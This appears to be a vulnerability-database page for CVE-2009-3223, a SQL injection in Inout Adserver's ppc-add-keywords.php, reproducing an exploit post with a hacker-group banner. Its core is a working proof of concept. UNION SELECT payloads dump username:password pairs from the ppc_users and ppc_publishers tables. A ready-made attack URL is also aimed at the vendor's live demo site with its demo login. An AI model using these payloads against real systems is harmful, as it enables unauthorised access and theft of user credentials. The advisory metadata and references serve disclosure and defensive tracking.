Inout Adserver (id) Remote SQL injection Vulnerability

2009-09-17 / 2009-09-18

Credit: boom3rang

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2009-3223

CWE: CWE-89

CVSS Base Score: 6.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 8/10

Exploit range: Remote

Attack complexity: Low

Authentication: Single time

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

# Inout Adserver (id) Remote SQL injection                         [_][-][X]
      _  ___  _  ___      ___ ___ _____      __  ___ __   __  ___       
     | |/ / || |/ __|___ / __| _ \ __\ \    / / |_  )  \ /  \/ _ \      
     | ' <| __ | (_ |___| (__|   / _| \ \/\/ /   / / () | () \_, /      
     |_|\_\_||_|\___|    \___|_|_\___| \_/\_/   /___\__/ \__/ /_/       
                                                                          
                                                                        
      Red n'black i dress eagle on my chest.
      It's good to be an ALBANIAN Keep my head up high for that flag i die.
      Im proud to be an ALBANIAN
   ########################################################################   

       Author             : boom3rang                              
       Contact            : boom3rang[at]live.com                         
       Greetz             : H!tm@N - KHG - cHs

                  R.I.P redc00de                 
   ------------------------------------------------------------------------

                  Affected software description    	                  
       Software 	: Inout Adserver            	                          
       Vendor		: http://www.inoutscripts.com/products/adserver/	           
       Price 	      	: Just $99.95          
       Version Vuln.   : /		
 
   ------------------------------------------------------------------------

                 Proof Of Concept!
               --------------------

= NOTE!! =
########################################################################################
First you need to create an Advertiser account to the site, it's free, then you need "login" to execute this exploit!
########################################################################################

Dork: N/W
---------------------------------------------------------------------------------------
SQLi:
http://localhost/PATH/ppc-add-keywords.php?id= [ Exploit ]
---------------------------------------------------------------------------------------
Exploit: 
   1+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_users--

   1+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_publishers--
---------------------------------------------------------------------------------------

Example:
http://localhost/PATH/ppc-add-keywords.php?id=1+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_users--

---------------------------------------------------------------------------------------

LiveDemo:

Advertiser Demo Login!   
Username : advertiser
Password : advertiser 

http://www.inoutscripts.com/demo/inout_adserver/ppc-add-keywords.php?id=348+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_users--

References:

http://www.vupen.com/english/advisories/2009/2028

http://www.milw0rm.com/exploits/9271

http://secunia.com/advisories/35975

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Inout Adserver (id) Remote SQL injection Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.